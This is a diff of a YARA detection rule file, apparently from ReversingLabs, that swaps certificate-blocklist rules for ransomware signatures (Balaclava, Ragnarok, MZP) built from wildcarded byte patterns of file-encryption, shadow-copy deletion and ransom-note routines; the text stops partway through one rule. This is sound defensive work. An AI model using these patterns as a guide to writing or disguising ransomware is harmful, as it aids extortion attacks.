+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Balaclava.yara#L1-L113"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "01b43e6ea7ceebdbdda7e1f7c5bd2439a460b8aed4a1837755fa3679e9893ff3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Balaclava"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 83 EC ?? 53 56 8B 75 ?? 33 D2 57 6A ?? 5B 8B 7E ?? 89 55 ?? 8D 4F ?? 66 8B
+            07 03 FB 66 3B C2 75 ?? 2B F9 B9 ?? ?? ?? ?? D1 FF E8 ?? ?? ?? ?? 50 FF 76 ?? 89 45
+            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
+            45 ?? 83 C0 ?? 89 45 ?? 8B D8 33 D2 8D 4B ?? 66 8B 03 83 C3 ?? 66 3B C2 75 ?? 2B D9
+            D1 FB 8D 04 3B 3D ?? ?? ?? ?? 7C ?? 8D 04 45 ?? ?? ?? ?? 50 39 56 ?? 74 ?? FF 76 ??
+            52 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? EB ?? 52 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ??
+            ?? ?? 39 46 ?? 74 ?? 89 46 ?? 8B 46 ?? 33 C9 66 89 0C 78 8B 55 ?? F7 02 ?? ?? ?? ??
+            0F 85 ?? ?? ?? ?? 33 D2 8B C2 6A ?? 89 45 ?? 59 89 4D ?? 3B C1 7F ?? 03 C1 8B 4D ??
+            99 2B C2 D1 F8 89 45 ?? 8B 14 85 ?? ?? ?? ?? 66 8B 01 66 3B 02 75 ?? 66 85 C0 74 ??
+            66 8B 41 ?? 66 3B 42 ?? 75 ?? 83 C1 ?? 83 C2 ?? 66 85 C0 75 ?? 33 D2 8B C2 EB ?? 1B
+            C0 83 C8 ?? 33 D2 85 C0 0F 84 ?? ?? ?? ?? 79 ?? 8B 4D ?? 8B 45 ?? 49 EB ?? 8B 45 ??
+            8B 4D ?? 40 89 45 ?? EB ?? 8B 45 ?? F6 00 ?? 0F 84 ?? ?? ?? ?? 8D 04 5D ?? ?? ?? ??
+            50 8B 46 ?? FF 75 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? 8B 46 ??
+            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7E ?? ?? 74
+            ?? 83 7E ?? ?? 7E ?? FF 76 ?? 8B 4E ?? FF 76 ?? E8 ?? ?? ?? ?? 59 59 8B 4E ?? 8D 14
+        }
+		$find_files_p2 = {
+            3B A1 ?? ?? ?? ?? 56 89 44 51 ?? 66 A1 ?? ?? ?? ?? 66 89 44 51 ?? FF 46 ?? E8 ?? ??
+            ?? ?? FF 4E ?? E9 ?? ?? ?? ?? 39 56 ?? 0F 85 ?? ?? ?? ?? 8D 04 5D ?? ?? ?? ?? 50 8B
+            46 ?? FF 75 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 5E ?? 83 C4 ?? 8B CB B8 ?? ??
+            ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ??
+            83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B CB 8D
+            51 ?? 66 8B 01 83 C1 ?? 66 3B 45 ?? 75 ?? 2B CA D1 F9 83 F9 ?? 72 ?? 8B CB 8D 51 ??
+            66 8B 01 83 C1 ?? 66 3B 45 ?? 75 ?? 2B CA D1 F9 83 C1 ?? 68 ?? ?? ?? ?? 8D 04 4B 50
+            FF 15 ?? ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 A8 ?? 74 ?? 83 E0 ??
+            50 FF 76 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BB ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? EB ?? 85 C0 75 ?? 6A ?? 53 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ??
+            ?? ?? ?? 6A ?? 58 3B C8 A1 ?? ?? ?? ?? 74 ?? 83 F8 ?? 74 ?? FF 76 ?? A1 ?? ?? ?? ??
+            33 D2 6A ?? 03 C1 59 F7 F1 FF 34 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 05 ?? ?? ?? ??
+            FF 05 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 6A
+            ?? 59 66 89 4C 78 ?? 33 C9 8B 46 ?? 66 89 0C 78 FF 75 ?? 8B 5D ?? 53 FF 15 ?? ?? ??
+            ?? 85 C0 74 ?? 8B 45 ?? E9 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 5D ?? 33 FF 39 7E ??
+            75 ?? 89 3E 53 FF 15 ?? ?? ?? ?? 8B DF 8B 4D ?? E8 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5
+            5D C2
+        }
+		$encrypt_files_p1 = {
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 55 ?? 8B C1 89 45 ?? C7 45 ?? ?? ??
+            ?? ?? 33 F6 89 75 ?? 83 4D ?? ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75
+            ?? 56 68 ?? ?? ?? ?? 6A ?? 56 56 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ??
+            83 FB ?? 74 ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 0B 45 ?? 74 ??
+            8B FE EB ?? 33 FF 47 89 7D ?? 85 FF 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89
+            45 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF 75 ?? FF D0 8B C8 A1 ?? ?? ?? ?? EB ?? 8B
+            CE 85 C9 0F 84 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF 75 ?? FF D0 EB ?? 8B C6 85 C0 0F 84
+            ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 8B 7D ?? 57 53 FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? 83 CF ?? 89 7D ?? E9 ?? ?? ?? ?? 8B 45 ?? 3B C6 7C ?? 8B 4D ?? 7F ?? 81 F9 ?? ??
+            ?? ?? 76 ?? 81 E9 ?? ?? ?? ?? 1B C6 50 51 33 D2 8B CB E8 ?? ?? ?? ?? 59 59 23 C2 89
+        }
+		$encrypt_files_p2 = {
+            75 ?? 85 F6 75 ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 03 C7 50 53 FF 15 ?? ?? ??
+            ?? 8B FE 89 7D ?? EB ?? 56 56 6A ?? 5A 8B CB E8 ?? ?? ?? ?? 59 59 23 C2 8B FE 89 7D
+            ?? 85 FF 75 ?? 56 8D 45 ?? 50 6A ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 8B 4D ?? FF 71 ?? FF 71 ?? 8D 41 ?? 50 FF 71 ?? 6A ?? 5A 8B 4D ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 0F B6 C0 23 F8 89 7D ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 8B 45 ?? FF 70
+            ?? FF 70 ?? 53 FF 15 ?? ?? ?? ?? 56 8D 45 ?? 50 8B 45 ?? FF 70 ?? FF 70 ?? 53 FF 15
+            ?? ?? ?? ?? 51 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 45 ?? 50 8B 55 ?? 52
+            8B 4D ?? 8B 45 ?? 03 C1 50 52 51 51 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 56 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 56 56 33 D2 8B CB E8 ?? ?? ?? ?? 59 59 56 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF
+            15 ?? ?? ?? ?? 83 7D ?? ?? 76 ?? 8B 45 ?? 2D ?? ?? ?? ?? 8B 4D ?? 1B CE 51 50 33 D2
+            8B CB E8 ?? ?? ?? ?? 59 59 56 8D 45 ?? 50 FF 75 ?? 8B 45 ?? 03 45 ?? 50 53 FF 15 ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 4D ?? ?? E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? C3
+        }
+		$find_volumes = {
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 33 DB 53 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 56 53 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ??
+            ?? 89 5D ?? 6A ?? 5B 8D B5 ?? ?? ?? ?? 8D 4E ?? 33 D2 66 8B 06 83 C6 ?? 66 3B C2 75
+            ?? 2B F1 D1 FE 66 39 9D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 39 9D ?? ?? ?? ?? 75 ?? 66
+            83 BD ?? ?? ?? ?? ?? 75 ?? 66 39 9D ?? ?? ?? ?? 75 ?? 66 39 9C 75 ?? ?? ?? ?? 75 ??
+            33 C0 66 89 84 75 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 66 89 9C 75 ?? ?? ?? ?? 85 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 4D ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 7D ?? 57 FF 15 ??
+            ?? ?? ?? 8B 65 ?? E8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Planeta, TOV" and ( pe.signatures [ i ] . serial == "00:b7:21:79:c0:27:b9:03:7e:e2:20:e8:1a:b1:8f:e5:6d" or pe.signatures [ i ] . serial == "b7:21:79:c0:27:b9:03:7e:e2:20:e8:1a:b1:8f:e5:6d" ) and 1603381300 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_volumes ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_07B74C70C4Aa092648B7F0D1A8A3A28F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ragnarok : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ragnarok ransomware."
 		author = "ReversingLabs"
-		id = "f941b7d6-f168-57aa-881a-54679a2b948c"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "263a671e-dfdb-5ab8-9bb9-355c76a88c10"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6902-L6918"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "97759fa2e519936115f0493e251f9abc0cce3ada437776a5a370388512235491"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Ragnarok.yara#L1-L110"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "aaa17ab98b59a5c8c71a2b82a9bf29dd3a1a1719deaf08a3bafa77895bc10311"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ragnarok"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
+            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F 8B E5 5D C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8
+            ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            75 ?? FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B
+            5D ?? 8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59
+            EB ?? 8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF
+            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
+            C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C
+            ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95
+            ?? ?? ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53
+            57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ??
+            74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ??
+            ?? ?? 56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ??
+            ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8
+        }
+		$find_files_p2 = {
+            83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF
+            15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ??
+            89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ??
+            ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80
+            38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ??
+            ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ??
+            2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
+            83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 8B 4D ?? 56 57 89
+            85 ?? ?? ?? ?? 33 FF 33 C0 89 8D ?? ?? ?? ?? 6A ?? 51 89 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 70 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 8A 0E
+            3A 08 75 ?? 84 C9 74 ?? 8A 4E ?? 3A 48 ?? 75 ?? 83 C6 ?? 83 C0 ?? 84 C9 75 ?? 33 C0
+            EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 53 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8
+            68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 8B 40 ?? 8B F8 E8 ?? ?? ?? ??
+            33 D2 B9 ?? ?? ?? ?? F7 F1 8A 04 3A 88 04 1E 46 83 FE ?? 7C ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 33 C9 23 F9 89 8D ?? ?? ?? ?? 3D ?? ?? ?? ??
+            0F 87 ?? ?? ?? ?? 48 83 E0 ?? 83 C0 ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? FF B5 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF
+        }
+		$encrypt_files_p2 = {
+            0F 84 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ??
+            ?? 83 C4 ?? 33 FF 3B B5 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 3B 85 ?? ?? ?? ?? 0F 85
+            ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ??
+            ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 53 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 85 ?? ?? ??
+            ?? 57 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 75 ?? 57 6A ??
+            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 3B 85 ?? ?? ?? ?? 75 ?? 57 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 33 FF 56 E8
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 5B 85 C0 74 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 33 CD
+            5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$disable_fw_and_delete_shadow_volumes = {
+            6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 74 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? FF D7 E9 ?? ??
+            ?? ?? 6A ?? FF 35 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ??
+            50 FF 35 ?? ?? ?? ?? FF D3 6A ?? FF 35 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ?? 8B 48 ?? 51
+            FF 35 ?? ?? ?? ?? FF D3 8B F8 8D 85 ?? ?? ?? ?? 50 FF D6 8D 45 ?? 50 8D 85 ?? ?? ??
+            ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 40 ?? 50 6A ?? FF 95 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ??
+            ?? ?? ?? 8B 40 ?? 50 6A ?? FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ??
+            FF D6 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 40 ?? 50 6A ?? FF D6
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rad-Grad D.O.O." and pe.signatures [ i ] . serial == "07:b7:4c:70:c4:aa:09:26:48:b7:f0:d1:a8:a3:a2:8f" and 1603240965 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $disable_fw_and_delete_shadow_volumes ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4C8Def294478B7D59Ee95C61Fae3D965 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_MZP : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects MZP ransomware."
 		author = "ReversingLabs"
-		id = "549249df-690c-5b75-ac1a-77b509c9e163"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c08a4080-fa26-5b7b-869d-5f59096b1a12"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6920-L6936"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3b7b10afa5f0212bd494ba8fe32bef18f2bbd77c8ab2ad498b9557a0575cc177"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.MZP.yara#L1-L147"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "724ae1033bfb8ff494b30e6b3333e6c848375f1b001b75e71c9444c9f9f31251"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "MZP"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$show_ransom_note_p1 = {
+            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 53 56 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ??
+            ?? 88 55 ?? 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 8B C3 E8 ?? ?? ??
+            ?? 89 1D ?? ?? ?? ?? 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 33 C0
+            89 46 ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ??
+            6A ?? 6A ?? 8D 45 ?? 50 33 C9 B2 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8D 86 ??
+            ?? ?? ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ??
+            C6 86 ?? ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 33 C0 89 86 ?? ??
+            ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? ??
+            ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ??
+            ?? ?? C6 86 ?? ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 E8
+            ?? ?? ?? ?? B2 ?? 8B C6 E8 ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? 8B 00 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 33 D2 8B C6 E8
+        }
+		$show_ransom_note_p2 = {
+            C6 86 ?? ?? ?? ?? ?? C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 33 D2 E8 ?? ??
+            ?? ?? C6 86 ?? ?? ?? ?? ?? C6 86 ?? ?? ?? ?? ?? 89 B6 ?? ?? ?? ?? C7 86 ?? ?? ?? ??
+            ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 33 C0 89 86 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? B2
+            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? C6 46 ?? ?? C6 46 ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 73 ?? C6 46
+            ?? ?? 8D 46 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
